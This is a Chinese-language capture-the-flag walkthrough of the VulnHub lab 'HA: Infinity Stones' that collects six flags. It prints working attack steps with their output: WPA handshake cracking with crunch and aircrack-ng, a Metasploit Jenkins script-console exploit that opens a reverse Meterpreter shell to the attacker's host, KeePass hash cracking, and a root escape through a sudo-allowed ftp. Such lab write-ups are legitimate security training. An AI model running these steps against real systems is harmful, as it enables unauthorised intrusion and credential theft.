信息收集
➜ ~ nmap -sn 192.168.116.1/24
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-23 19:53 CST
Nmap scan report for 192.168.116.1
Host is up (0.0019s latency).
Nmap scan report for 192.168.116.137
Host is up (0.00076s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 2.55 seconds
➜ ~ nmap -A -T4 192.168.116.137 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-23 20:09 CST
Nmap scan report for 192.168.116.137
Host is up (0.0091s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 84:d2:2e:c4:f7:21:12:54:05:ac:82:c4:05:f2:32:29 (RSA)
| 256 f7:9d:0f:23:ec:d6:de:ed:2b:b2:11:bf:ea:68:3d:b9 (ECDSA)
|_ 256 78:ef:fc:36:47:e6:f3:8d:03:3a:39:69:60:4f:2a:71 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA:Infinity Stones
443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA:Infinity Stones
| ssl-cert: Subject: commonName=ignite/organizationName=MINDSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}/stateOrProvinceName=UP/countryName=IN
| Not valid before: 2019-09-15T17:18:57
|_Not valid after: 2020-09-14T17:18:57
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
8080/tcp open http Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.67 seconds
➜ ~
- SHH和3個Web服務:
- 80端口:主頁顯示的是六顆寶石的圖片,還有一個答題的頁面。
- 443端口:Nmap輸出的證書一看就不正常,這么長。
- 第一顆寶石到手,
MINDSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}。
- 8080端口:跳轉到了Jenkins的登錄頁面。
- 先掃80端口的目錄
➜ ~ dirb http://192.168.116.137
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Sep 23 20:32:09 2019
URL_BASE: http://192.168.116.137/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.116.137/ ----
==> DIRECTORY: http://192.168.116.137/images/
==> DIRECTORY: http://192.168.116.137/img/
+ http://192.168.116.137/index.html (CODE:200|SIZE:3261)
+ http://192.168.116.137/server-status (CODE:403|SIZE:280)
==> DIRECTORY: http://192.168.116.137/wifi/
---- Entering directory: http://192.168.116.137/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.116.137/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.116.137/wifi/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Mon Sep 23 20:32:12 2019
DOWNLOADED: 4612 - FOUND: 2
➜ ~
http://192.168.116.137/wifi/
http://192.168.116.137/img/
http://192.168.116.137/images/
破解WiFi密碼
- 在wifi這個目錄下,有一個pwn.txt,里面好像是密碼的規則;還有一個數據包,前面的密碼應該是用來解這個數據包的。
➜ ~ curl "http://192.168.116.137/wifi/pwd.txt"
Your Password is thanos daughter name "gam" (note it's all lower case) plus the following
I enforced new password requirement on you ... 12 characters
One uppercase charracter
Two Numbers
Two Lowercase
The Year of first avengers came out in threatre
➜ ~
- 密碼提示為以gam都是小寫開頭,再加上一個大寫字母,兩個數字,兩個小寫字母,復仇者聯盟第一次上映的年份。就像:gamA12bc2012,一共是12位密碼。
- crunch走起:
% 代表數字
^ 代表特殊符號
@ 代表小寫字母
, 代表大寫字符
---
➜ VulnHub crunch 12 12 -t gam,%%@@2012 -o dict.txt
Crunch will now generate the following amount of data: 22848800 bytes
21 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 1757600
crunch: 100% completed generating output
➜ VulnHub
➜ VulnHub aircrack-ng reality.cap -w dict.txt
Opening reality.capease wait...
Read 4848 packets.
# BSSID ESSID Encryption
1 38:D5:47:42:EE:A0 Kavish_2.4Ghz WPA (1 handshake)
Choosing first network as target.
Opening reality.capease wait...
Read 4848 packets.
1 potential targets
Aircrack-ng 1.5.2
[00:00:56] 128345/1757592 keys tested (2277.47 k/s)
Time left: 11 minutes, 55 seconds 7.30%
KEY FOUND! [ gamA00fe2012 ]
Master Key : 90 EC 8F B0 CC E3 C5 0E EE AC AD 05 0B A9 08 47
FD 4D 3E 55 60 7D B3 B0 92 21 FB 06 BA 96 53 90
Transient Key : 66 85 68 5E A3 0C BD 5E 6E 3D ED 66 DC 07 76 9F
08 5B CD E3 58 56 D6 AB 18 5C CC 75 7C 1D A3 E7
87 BE 75 0F 24 EA 12 AC C5 EE 56 34 4C B5 3A 40
73 77 F2 F3 D0 C7 DC E5 ED 5A A0 83 87 37 94 31
EAPOL HMAC : AB 9A 17 CA 09 25 69 2B 71 06 76 EA F8 FE 23 67
➜ VulnHub
- 密碼為:gamA00fe2012,然后可以用WireShark把數據包里的內容看一下。一開始還以為Flag在數據包了,因為以前有遇到這種情況。既然寫到了這里就順便寫一下怎么解加密的WiFi的pcap包,所以大家不要去連接一些陌生的WiFi熱點。
➜ VulnHub airdecap-ng -e Kavish_2.4Ghz -p gamA00fe2012 reality.cap
Total number of stations seen 5
Total number of packets read 4848
Total number of WEP data packets 0
Total number of WPA data packets 245
Number of plaintext data packets 0
Number of decrypted WEP packets 0
Number of corrupted WEP packets 0
Number of decrypted WPA packets 136
Number of bad TKIP (WPA) packets 0
Number of bad CCMP (WPA) packets 0
- 解完默認在目錄下生成一個
reality-dec.cap文件,直接用WireShark打開就可以看到里面的數據了,開不開心,驚不驚訝,一般人我不告訴他。
- 或者用WireShark在首選項里的協議里IEEE802.11加上WiFi的密碼。
- 但搞了這么久,發現Flag並不是在數據包了,真是日了狗了。其實在密碼作為URL的路徑,里面有一個文件存着Flag。
➜ VulnHub curl "http://192.168.116.137/gamA00fe2012/realitystone.txt"
REALITYSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}
➜ VulnHub
- 第二課寶石拿到手:
REALITYSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}
小考試
- 第二條線索,
Computers tells us Binary is the path to Reality.,答題頁面的提示。就是一個小考試,對的為1,錯的為0,一共8道題,8位數字作為URL的路徑。這里直接爆破好了,反正也不會英語。
➜ VulnHub dirb http://192.168.116.137 01.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Sep 24 00:16:29 2019
URL_BASE: http://192.168.116.137/
WORDLIST_FILES: 01.txt
-----------------
GENERATED WORDS: 256
---- Scanning URL: http://192.168.116.137/ ----
==> DIRECTORY: http://192.168.116.137/01101001/
---- Entering directory: http://192.168.116.137/01101001/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Tue Sep 24 00:16:29 2019
DOWNLOADED: 256 - FOUND: 0
➜ VulnHub
➜ VulnHub curl "http://192.168.116.137/01101001/hints.txt"
+++++ ++++[ ->+++ +++++ +<]>+ +++++ +++++ +++++ .+++. +++++ ++++. ----.
+++++ .<+++ ++++[ ->--- ----< ]>--- .<+++ +++[- >++++ ++<]> +++.< ++++[
->+++ +<]>+ ++++. <++++ [->-- --<]> -.+++ +++++ +.--- ----. --.<+ ++[->
+++<] >++++ .+.<
➜ VulnHub
- 上面的奇怪的字符簡稱BF,全稱不好寫在博客。在線解解密得
admin:avengers,像基本認證的賬號和密碼,先放一邊。
Exif信息
- 上面掃到的img目錄,只有一張圖片,exiftool讀exif信息發現了Flag。
➜ VulnHub wget http://192.168.116.137/img/space.jpg
--2019-09-24 00:22:01-- http://192.168.116.137/img/space.jpg
正在連接 192.168.116.137:80... 已連接。
已發出 HTTP 請求,正在等待回應... 200 OK
長度:17002 (17K) [image/jpeg]
正在保存至: “space.jpg”
space.jpg 100%[==========================================================================================================================================>] 16.60K --.-KB/s 用時 0s
2019-09-24 00:22:01 (98.5 MB/s) - 已保存 “space.jpg” [17002/17002])
➜ VulnHub exiftool space.jpg
ExifTool Version Number : 11.50
File Name : space.jpg
Directory : .
File Size : 17 kB
File Modification Date/Time : 2019:09:13 13:35:30+08:00
File Access Date/Time : 2019:09:24 00:22:01+08:00
File Inode Change Date/Time : 2019:09:24 00:22:01+08:00
File Permissions : rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Comment : SPACESTONE:{74E57403424607145B9B77809DEB49D0}
Image Width : 768
Image Height : 432
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 768x432
Megapixels : 0.332
➜ VulnHub
- 第三顆寶石到手:
SPACESTONE:{74E57403424607145B9B77809DEB49D0}。
Jenkins
- 上面找到了一組賬號密碼
admin:avengers,嘗試登錄http://192.168.116.137:8080/login?from=%2F,一個Jenkins管理后台,密碼正確,先丟鏈接https://github.com/gquere/pwn_jenkins。剛好8天前出了一個git client的RCE,還想試試來着,打開插件管理看到版本是2.8.6,git plugin存在漏洞的在<3.12.0版本內,但是安裝版本為3.12.1,MSF里有利用腳本,真香。
msf5 exploit(multi/http/jenkins_script_console) > show options
Module options (exploit/multi/http/jenkins_script_console):
Name Current Setting Required Description
---- --------------- -------- -----------
API_TOKEN no The API token for the specified username
PASSWORD avengers no The password for the specified username
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.116.137 yes The target address range or CIDR identifier
RPORT 8080 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The path to the Jenkins-CI application
URIPATH no The URI to use for this exploit (default is random)
USERNAME admin no The username to authenticate as
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
1 Linux
msf5 exploit(multi/http/jenkins_script_console) > run
[*] Started reverse TCP handler on 192.168.116.1:4444
[*] Checking access to the script console
[*] Logging in...
[*] Using CSRF token: '8c428c023cf3d9b8ad5a0b5ec036aff8' (Jenkins-Crumb style)
[*] 192.168.116.137:8080 - Sending Linux stager...
[*] Sending stage (985320 bytes) to 192.168.116.137
[*] Meterpreter session 1 opened (192.168.116.1:4444 -> 192.168.116.137:36498) at 2019-09-24 15:30:27 +0800
meterpreter >
- 轉交互式終端:
python3 -c 'import pty;pty.spawn("/bin/bash")',環境變量了沒有python的路徑,但有3的。
python3 -c 'import pty;pty.spawn("/bin/bash")'
jenkins@ubuntu:/home/morag$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/umount
/bin/su
/bin/mount
/bin/fusermount
/bin/ping
/bin/ntfs-3g
/opt/script
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/arping
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/vmware-user-suid-wrapper
/usr/bin/traceroute6.iputils
/usr/bin/passwd
/usr/sbin/pppd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/snap/core18/1144/bin/mount
/snap/core18/1144/bin/ping
/snap/core18/1144/bin/su
/snap/core18/1144/bin/umount
/snap/core18/1144/usr/bin/chfn
/snap/core18/1144/usr/bin/chsh
/snap/core18/1144/usr/bin/gpasswd
/snap/core18/1144/usr/bin/newgrp
/snap/core18/1144/usr/bin/passwd
/snap/core18/1144/usr/bin/sudo
/snap/core18/1144/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1144/usr/lib/openssh/ssh-keysign
/snap/core/7713/bin/mount
/snap/core/7713/bin/ping
/snap/core/7713/bin/ping6
/snap/core/7713/bin/su
/snap/core/7713/bin/umount
/snap/core/7713/usr/bin/chfn
/snap/core/7713/usr/bin/chsh
/snap/core/7713/usr/bin/gpasswd
/snap/core/7713/usr/bin/newgrp
/snap/core/7713/usr/bin/passwd
/snap/core/7713/usr/bin/sudo
/snap/core/7713/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/7713/usr/lib/openssh/ssh-keysign
/snap/core/7713/usr/lib/snapd/snap-confine
/snap/core/7713/usr/sbin/pppd
/snap/core/6350/bin/mount
/snap/core/6350/bin/ping
/snap/core/6350/bin/ping6
/snap/core/6350/bin/su
/snap/core/6350/bin/umount
/snap/core/6350/usr/bin/chfn
/snap/core/6350/usr/bin/chsh
/snap/core/6350/usr/bin/gpasswd
/snap/core/6350/usr/bin/newgrp
/snap/core/6350/usr/bin/passwd
/snap/core/6350/usr/bin/sudo
/snap/core/6350/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/6350/usr/lib/openssh/ssh-keysign
/snap/core/6350/usr/lib/snapd/snap-confine
/snap/core/6350/usr/sbin/pppd
jenkins@ubuntu:/home/morag$
jenkins@ubuntu:/home/morag$ cd /opt
cd /opt
jenkins@ubuntu:/opt$ ls
ls
morag.kdbx script
jenkins@ubuntu:/opt$ ./script
./script
TIMESTONE:{141BC86DFD5C40E3CC37219C18D471CA}jenkins@ubuntu:/opt$
- 第四顆寶石:
TIMESTONE:{141BC86DFD5C40E3CC37219C18D471CA}j
KeePass破解
- 還發現一個
kdbx后綴的文件morag是一個用戶名。
TIMESTONE:{141BC86DFD5C40E3CC37219C18D471CA}jenkins@ubuntu:/opt$ file morag.kdbx
file morag.kdbx
morag.kdbx: Keepass password database 2.x KDBX
jenkins@ubuntu:/opt$
- Keepass password database 2.x KDBX,下載回來keepass2john轉Hash再用John破解。
➜ VulnHub keepass2john morag.kdbx
morag:$keepass$*2*60000*0*ad52c2bc4d6e8f1aad80c53c3aa8c89cd010a2b06be6e9fc18339fc03f62b025*955d58975ce2542fbcc0e7d8b0a70df4eeadb12f02ca2be7b3c0c2dfe08766d9*ee9d589925b32d8a502d92252079ebef*6bdf7df906c8e9e51d24e9249c7a5356face1d19cc475bdd3024802e1134c32a*4112e70f66d462b734768ade8950f0157b8eb3748c571be886f891f9c906b1b0
➜ VulnHub keepass2john morag.kdbx >keepass.hash
➜ VulnHub john keepass.hash
Warning: detected hash type "KeePass", but the string is also recognized as "KeePass-opencl"
Use the "--format=KeePass-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 60000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES, 1=TwoFish, 2=ChaCha]) is 0 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 3 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
princesa (morag)
1g 0:00:00:13 DONE 2/3 (2019-09-24 16:03) 0.07283g/s 209.9p/s 209.9c/s 209.9C/s pretty..fuckyou1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
➜ VulnHub john keepass.hash --show
morag:princesa
1 password hash cracked, 0 left
- 賬號密碼為:
morag:princesa,因為在home目錄看到有morag這個用戶名,所以應該可以用上。先用KeePass打開morag.kdbx文件,輸入密碼,可以復制密碼到剪切板。An98XArsp1Ncj0hAZLda,發現密碼不對但是備注了還有一段文字,盲猜base64,解碼得到:morag:yondu,所以密碼為yondu。Jenkins切換用戶成功,也可以登錄ssh服務。
jenkins@ubuntu:/opt$ su morag
su morag
Password: yondu
morag@ubuntu:/opt$ ls
morag@ubuntu:~$ sudo -l
sudo -l
Matching Defaults entries for morag on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User morag may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/ftp
morag@ubuntu:~$
ftp> help
help
Commands may be abbreviated. Commands are:
! dir mdelete qc site
$ disconnect mdir sendport size
account exit mget put status
append form mkdir pwd struct
ascii get mls quit system
bell glob mode quote sunique
binary hash modtime recv tenex
bye help mput reget tick
case idle newer rstatus trace
cd image nmap rhelp type
cdup ipany nlist rename user
chmod ipv4 ntrans reset umask
close ipv6 open restart verbose
cr lcd prompt rmdir ?
delete ls passive runique
debug macdef proxy send
ftp> !/bin/bash
!/bin/bash
root@ubuntu:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~#
root@ubuntu:/root# ls
ls
final.txt
root@ubuntu:/root# cat final.txt
cat final.txt
┬┬╔═╗┌─┐┌┐┌┌─┐┬─┐┌─┐┌┬┐┬ ┬┬ ┌─┐┌┬┐┬┌─┐┌┐┌┌─┐ ┬ ┬┌─┐┬ ┬ ┌─┐┌─┐┬ ┬┌┐┌┌┬┐ ┌┬┐┬ ┬┌─┐ ┌─┐┬┌┐┌┌─┐┬ ┌─┐┬ ┌─┐┌─┐ ┬┬
││║ │ │││││ ┬├┬┘├─┤ │ │ ││ ├─┤ │ ││ ││││└─┐ └┬┘│ ││ │ ├┤ │ ││ ││││ ││ │ ├─┤├┤ ├┤ ││││├─┤│ ├┤ │ ├─┤│ ┬ ││
oo╚═╝└─┘┘└┘└─┘┴└─┴ ┴ ┴ └─┘┴─┘┴ ┴ ┴ ┴└─┘┘└┘└─┘ ┴ └─┘└─┘ └ └─┘└─┘┘└┘─┴┘ ┴ ┴ ┴└─┘ └ ┴┘└┘┴ ┴┴─┘ └ ┴─┘┴ ┴└─┘ oo
,g@@@@@@g,
@@@@NMMN@@@g,gggpg,
]@@@` "@@@@@@@@@@@@ ,,,,
]@@@ $@@@" "%@@@@@@@@@@g
]@@@ $@@@ ]@@@@M*"*%@@@g@@@@@@g
]@@@ $@@@ ]@@@L ]@@@@@NN@@@@g
]@@@ $@@@ ]@@@` ]@@@' ]@@@L
]@@@ggg $@@@ ]@@@` ]@@@ $@@P
]@@@@@@L $@@@@@@ ]@@@L ]@@@ $@@P
]@@@@@ 1 "%@@@@F '%@@@@@W $@@@,,, $@@P
]@@@@@, $@@@L 2 ]@@@M '%@@@@@ ]@@@@,
,,,,]@@@@@@@g@@@@@@@, ,@@@@ 3 $@@@' '%@@@
,g@@@@@@@@@@"%%N@@NM*%@@@@@@@@@@@@,,,,@@@@L 4 ]@@@F
g@@@M*"""%@@@ '"MMMMM'"%@@@@@@@@@@@@g,,g@@@M
j@@@F ]@@@ "****' "%@@@@@@@@P
]@@@L ]@@@ ,ggggg, ''"}$@@P
]@@@L g@@@@@@ g@@@@@@@@@g j@@@ $@@P
]@@@L %NN@@@@ $@@@C ]@@@@ ]@@@L $@@P
]@@@L '%M" j@@@F 6 ]@@@ ]@@@L $@@P
]@@@L '@@@@ $@@@ ]@@@L $@@P
]@@@gg@@@@w ]@@@@ggg@@@@L ]@@@L]@@@L
%@@@@@@NM" '%@@@@@@@M` ;@@@M j@@@L
]@@@@ ,@@g ''` #@@@M )@@@M
]@@@L 5 $@@@ `**`,@@@@F
]@@@Wggg@@@@F ,g@@@@@`
"%@@@@@@@@@@@@@@@g ,@@@@@@@@@
'""*%N@@@@@@@M *MF" '$@@@
@@@@ gg, j@@@,
$@@@` j@@@L %@@@
.@@@@ %@@@ ]@@@
SOULSTONE:{56F06B4DAC14CE346998483989ABFF16}
-----------Contact Undersigned to share your feedback with HACKING ARTICLES Teams-------------
AArti Singh: https://www.linkedin.com/in/aarti-singh-353698114/
Kavish Tyagi: Tyagi_kavish_ Twitter
- 第五顆寶石到手:
SOULSTONE:{56F06B4DAC14CE346998483989ABFF16}
- 還有一顆在KeePass的Flag標簽里
POWERSTONE:{EDDF140F156862C9B494C0B767DCD412}
- 六顆都集完了,打個響指吧。
